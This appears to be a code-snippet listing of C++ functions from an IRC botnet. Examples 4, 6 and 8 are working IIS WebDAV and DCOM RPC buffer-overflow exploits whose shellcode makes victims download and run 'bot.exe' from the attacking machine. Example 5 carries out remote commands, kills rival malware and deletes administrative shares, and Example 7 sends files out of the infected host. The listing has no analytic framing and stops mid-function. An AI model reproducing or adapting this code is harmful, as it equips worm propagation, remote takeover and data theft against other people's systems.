Example #1
0
bool CMac::HandleCommand(CMessage *pMsg)
{	if(!pMsg->sCmd.Compare("login"))
	{	if(g_pMainCtrl->m_cMac.AddLogin(pMsg->sChatString.Token(1, " ", true), pMsg->sChatString.Token(2, " ", true), pMsg->sSrc, pMsg->sHost, pMsg->sIdentd))
		{	CString sReply; sReply.Format("Password accepted.");
			g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
			return true; }
		else return false; }

	else if(!pMsg->sCmd.Compare("mac.logout"))
	{	if(g_pMainCtrl->m_cMac.DelLogin(CString(""), pMsg->sSrc))
		{	CString sReply; sReply.Format("User %s logged out.", pMsg->sSrc.CStr());
			g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str());
			return true; }
		else return false; }

	return false; }
Example #2
0
bool CMac::CheckPassword(CString sPassword, user *pUser)
{	if(!sPassword.CStr()) return false;
	md5::MD5_CTX md5; md5::MD5Init(&md5); unsigned char szMD5[16]; CString sMD5; sMD5.Assign("");
	md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength());
	md5::MD5Final(szMD5, &md5); for(int i=0;i<16;i++)
	{	CString sTemp; sTemp.Format("%2.2X", szMD5[i]); sMD5.Append(sTemp); }
	if(!pUser->sPassword.Compare(sMD5)) return true;
	return false; }
Example #3
0
  CString::CString(const CString& str)
  : length_(str.Length())
  , reserved_(0) {
    if ((string_ = static_cast<char*>(::malloc(length_ + 1))) == 0) {
      base_throw(InternalError, "malloc failed");
    }

    ::memcpy(static_cast<void*>(string_), str.Str(), length_);
    string_[length_] = '\0';
  }
Example #4
0
bool CScannerHTTP::ExploitIISWebDav(int iHTTPType, unsigned short sRet) {
	char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000);
	unsigned short ret=sRet; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0;

	CString sURL;

	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://bla:bla@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://bla:bla@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
	
	// Build a buffer with the shellcode
	memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
	memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
	iSCSize=iPos; iPos=0;

	// Build the request
	memset(szReqBuf, 0, 100000);
	strcpy(szReqBuf, "SEARCH /");
	unsigned int j, i=strlen(szReqBuf); szReqBuf[i]='\x90';
	for(j=i+1; j<i+2150; j+=2) { *(unsigned short*)&szReqBuf[j]=(unsigned short)ret; } // EIP will be szReqBuf[8+2087]
	for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone!
	memcpy(&szReqBuf[j], jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request

	strcpy(szReqBuf+strlen(szReqBuf), " HTTP/1.1\r\n");
	sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize);
	strcpy(szReqBuf+strlen(szReqBuf), body);
	memset(szReqBuf+strlen(szReqBuf), 0x01, 1);
	memset(szReqBuf+strlen(szReqBuf), 0x90, 3);
	strcpy(szReqBuf+strlen(szReqBuf), szSCBuf);
	iReqSize=strlen(szReqBuf);
	
	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit
	{	free(szReqBuf); return false; }

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; }
	// Read reply
	m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000);

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); free(szReqBuf); return true; }
Example #5
0
bool CBot::HandleCommand(CMessage *pMsg)
{	
	// ID
	if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); 
	}

	// Execute
	else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr()))
	{
		CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
		#ifdef WIN32
			CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
			sText.Assign(sTextExp); 
			PROCESS_INFORMATION pinfo; 
			STARTUPINFO sinfo;
			memset(&sinfo, 0, sizeof(STARTUPINFO)); 
			sinfo.cb=sizeof(sinfo);
			if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
			if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; }
		#endif
		return true; 
	}

	// Remove Bot
	else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) 
	{
		CString sNick(pMsg->sChatString.Token(1, " ", true));
		if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) {
			if(g_cMainCtrl.m_cBot.as_enabled.bValue)
				g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue);
			if(g_cMainCtrl.m_cBot.as_service.bValue)
				g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue);
			g_cMainCtrl.m_cInstaller.Uninstall();
			g_cMainCtrl.m_cIRC.m_bRunning=false;
			g_cMainCtrl.m_bRunning=false; 
		}
	}

	// About
	else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); 
	}

	
	// Flush DNS
	else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) 
	{
		#ifdef WIN32
			// ipconfig.exe /flushdns
			Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr());
		#endif
		return true; 
	}

	// Open File
	else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) 
	{
		CString sText; 
		sText=pMsg->sChatString.Token(1, " ").CStr(); 
		CString bRet;

		bRet=(char)ShellExecute(
			NULL, 
			"open", 
			sText.CStr(), 
			NULL,
			NULL,
			SW_SHOWNORMAL
		);

	//	bRet=system(sText.CStr())>0;
	//	if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
		//else return 
		g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); 
	}

	// Quit
	else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) 
	{
		g_cMainCtrl.m_cIRC.m_bRunning=false; 
		return true; 
	}

	// DNS
	else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) 
	{
		CString sReply; 
		hostent *pHostent=NULL; 
		in_addr iaddr;
		if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
		unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
		if(addr!=INADDR_NONE) {
			pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
			if(pHostent) {
				sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			}
		} else {
			pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
			if(pHostent) {
				iaddr=*((in_addr*)*pHostent->h_addr_list);
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			} 
		}
		if(!pHostent) {
			sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr());
			return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
		} 
	}

	// Random Nickname
	else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) 
	{
		CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr());
		g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
		return true; 
	}

	// Run Command
	else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) 
	{	
		#ifdef WIN32
			if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
			CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); 
			bool bRet=false;
			CString sReplyBuf; 
			sReplyBuf.Format("Executed: %s.", sText.CStr());
			if(system(sText.CStr())==-1) 
			{ 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; 
			} else { 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; 
			}
		#endif
		return true; 
	}

	// System Information
	else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) 
	{
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); 
	}

	// Find Files
	//else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) 
//	{
	/*	CString strMask = pMsg->sChatString.Token(1, " ");
		CString strDir  = pMsg->sChatString.Token(2, " ");
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); 
	*/
	//}

	// Change Nickname
	else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) 
	{
		g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr());
		return true; 
	}

	// Uptime check (default: 7d)
	else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) 
	{
		int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); 
		if(!iDays) iDays=7;
		CString sUptime=LongUptime(iDays);
		if(sUptime.Compare("")) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				sUptime.Str(), pMsg->sReplyTo.Str());
		}
		return true; 
	}


	// Secure Bot
	else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) 
	{	
		#ifdef WIN32
		CString regLoc;
		regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr();


		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);
		
		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr());
		CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr());
		RegCloseKey(hkey);

		system("net share c$ /delete /y");
		system("net share d$ /delete /y");
		system("net share ipc$ /delete /y");
		system("net share admin$ /delete /y");



		#endif
		return true; 
	}

	return false; 
}
Example #6
0
bool CScannerDCOM2::Exploit()
{	char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
	int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
	char *pTemp;
	int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
	if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;

	CString sURL;

	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://bla:bla@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://bla:bla@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);

	iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
	
	memcpy(szLoadBuf+iPos,							dcom2_shellcode_buf,	sizeof(dcom2_shellcode_buf)		); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szLoaderBuf,			iLoaderSize						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser)	);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR,	&dcom2_my_offsets[0].lJmpAddr,	4						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, 	&dcom2_my_offsets[0].lTopSEH,	4						);
	iLoadSize=iPos; iPos=0;

	// Build the request
	memcpy(szReqBuf+iPos,	dcom2_request1,		sizeof(dcom2_request1)-1	); iPos+=sizeof(dcom2_request1)-1;
	memcpy(szReqBuf+iPos,	dcom2_request2,		sizeof(dcom2_request2)-1	); iPos+=sizeof(dcom2_request2)-1;
	memcpy(szReqBuf+iPos,	szLoadBuf,			iLoadSize					); iPos+=iLoadSize;
	memcpy(szReqBuf+iPos,	dcom2_request3,		sizeof(dcom2_request3)-1	); iPos+=sizeof(dcom2_request3)-1;
	memcpy(szReqBuf+iPos,	dcom2_request4,		sizeof(dcom2_request4)-1	); iPos+=sizeof(dcom2_request4)-1;
	iReqSize=iPos; iPos=0;

	pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
	*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iLoadSize / 2;
	*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize / 2; pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iLoadSize - 12;

    char szAssocGroup[4];

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
		return false;

	// Send the bind string
	if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_BINDACK
	if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
	// Store the association group for later usage
    memcpy(szAssocGroup, szRecvBuf+20, 4);

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_FAULT
	if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); return true;
}
Example #7
0
bool CDccCommand::HandleCommand(CMessage *pMsg)
{
	if(!pMsg->sCmd.Compare(m_cmdDccSend.sName.Str()))
	{

		DCC dcc;
		dcc.filename=pMsg->sChatString.Token(1, " ", true);

		char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH];

		int Fsend, bytes_sent;
		unsigned int move;
		unsigned __int64 totalbytes = 0;

		DWORD mode = 0;

		SOCKET ssock;
		while (1) {
			if ((ssock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
      			sprintf(sendbuf,"[DCC]: Failed to create socket.");
				break;
			}

			SOCKADDR_IN csin, ssin;
			memset(&ssin, 0, sizeof(ssin));
   			ssin.sin_family = AF_INET;
   			ssin.sin_port = htons(0);//random port
			ssin.sin_addr.s_addr = INADDR_ANY;
			
			if (bind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) {
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: failed to bind socket", pMsg->sReplyTo.Str());
				break;
			}
			int ssin_len = sizeof(ssin);
			getsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len);

			unsigned short portnum = ntohs(ssin.sin_port);
			char tmpdccfile[IRCLINE];
			strcpy(tmpdccfile,dcc.filename.Str());
			for (unsigned int i=0;i <= strlen(tmpdccfile); i++)
				tmpfile[i] = ((tmpdccfile[i] == 32)?(95):(tmpdccfile[i]));
			if (listen(ssock, 1) != 0) {
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: failed to open socket", pMsg->sReplyTo.Str());
				break;
			}
			HANDLE testfile = CreateFile(dcc.filename.CStr(),GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
			if (testfile == INVALID_HANDLE_VALUE) {
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: file doesn't exist", pMsg->sReplyTo.Str());
				sprintf(sendbuf,"[DCC]: File doesn't exist.");
				break;
			}

			int length = GetFileSize(testfile,NULL);

			CString dccOutPut;
			dccOutPut.Format("\1DCC SEND %s %i %i %i\1",
				dcc.filename.CStr(),
				htonl(inet_addr(GetIP(g_cMainCtrl.m_cIRC.m_sSocket))),
				portnum, length);

			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, dccOutPut.Str(), pMsg->sSrc);

			TIMEVAL timeout;
    		timeout.tv_sec = 60;//timeout after 60 sec.
    		timeout.tv_usec = 0;
			fd_set fd_struct;
			FD_ZERO(&fd_struct);
    		FD_SET(ssock, &fd_struct);

			if (select(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: timeout", pMsg->sReplyTo.Str());
				break;
			}
			int csin_len = sizeof(csin);
			if ((dcc.csock = accept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)  {
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: unable to open socket", pMsg->sReplyTo.Str());
				break;
			} 
			closesocket(ssock);

			while (length) {
				Fsend = 1024;
				if (Fsend>length) 
					Fsend=length;
				move = 0-length;

				memset(buffer,0,sizeof(buffer));
				SetFilePointer(testfile, move, NULL, FILE_END);
				ReadFile(testfile, buffer, Fsend, &mode, NULL);

				bytes_sent = send(dcc.csock, buffer, Fsend, 0);
				totalbytes += bytes_sent;

				if (recv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) {
					g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: socket error", pMsg->sReplyTo.Str());
					closesocket(dcc.csock);
					//clearthread(dcc.threadnum);

					ExitThread(1);
				}
				length = length - bytes_sent;
			}
			if (testfile != INVALID_HANDLE_VALUE) 
				CloseHandle(testfile);

			CString strTransMsg;
			strTransMsg.Format("dcc: complete to %s, file: %s, (%d bytes)",
				inet_ntoa(csin.sin_addr), dcc.filename.Str(), totalbytes);
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, strTransMsg.Str(), pMsg->sReplyTo.Str());		

			break;
		}
		if (ssock > 0)
			closesocket(ssock);
		closesocket(dcc.csock);
		//clearthread(dcc.threadnum);
		ExitThread(0);
	}
	return FALSE;
}
Example #8
0
bool CScannerDCOM::Exploit()
{
	switch(m_sSocket.m_sPort)
	{
	case 135:
	case 1025:
		{
			char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
			int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
			char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
			if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
			if(iHostOS==OS_WINNT) return false;
			
			CString sURL;

			if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
				sURL.Format("ftp://bla:bla@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
			else
				sURL.Format("ftp://bla:bla@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

			iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
			

			// Build a buffer with the shellcode
			memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
			memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
			memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
			iSCSize=iPos; iPos=0;

			// Prepend NOPs as long as shellcode doesn't fit RPC packet format
			while(iSCSize%16!=12)
			{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
				memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
				memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
				memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
				iSCSize=iPos; iPos=0; free(szTemp); }

			// Set the return address
			if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
				memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
			else
				memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

			// Build the request
			memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
			memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
			memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
			memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
			memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
			iReqSize=iPos;

			pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
			*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;
			
			// Connect to the server
			if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
				return false;
			// Send the bind string
			if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
			// Send the evil request
			if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }

			// Close the socket that was once funky fresh
